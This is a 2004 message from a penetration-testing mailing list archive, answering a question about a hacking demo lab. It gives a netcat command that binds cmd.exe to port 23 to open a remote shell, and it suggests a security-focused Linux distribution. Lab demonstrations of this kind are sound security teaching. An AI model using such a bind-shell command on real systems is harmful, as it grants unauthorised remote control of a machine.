Penetration Testing mailing list archives

RE: Hacking Demo and Test Lab

From: "Grissett, Chris CONT Ciber" <Chris.Grissett.Ciber () usarc-emh2 army mil>
Date: Fri, 11 Jun 2004 10:49:30 -0400

Try this command on the remote machine
nc -l -p 23 -t -e cmd.exe

This allows nc to listen on port 23 for connections.  When a connection is
made it will spawn a cmd[dos] shell, or whatever program you want to exec.
Hope that helps.  If that fails, you can really impress the execs by using
knoppix-std (http://knoppix-std.org), to do all your hacking demos.  Or if
you'd like, you could give me access to your lab, and Id do it for you.  I'm
kidding, of course I couldn't do that, plus it would violate numerous laws
and ethics :)  Are you familiar with linux?

Christopher Grissett
Security Analyst
Network Enterprise Security Team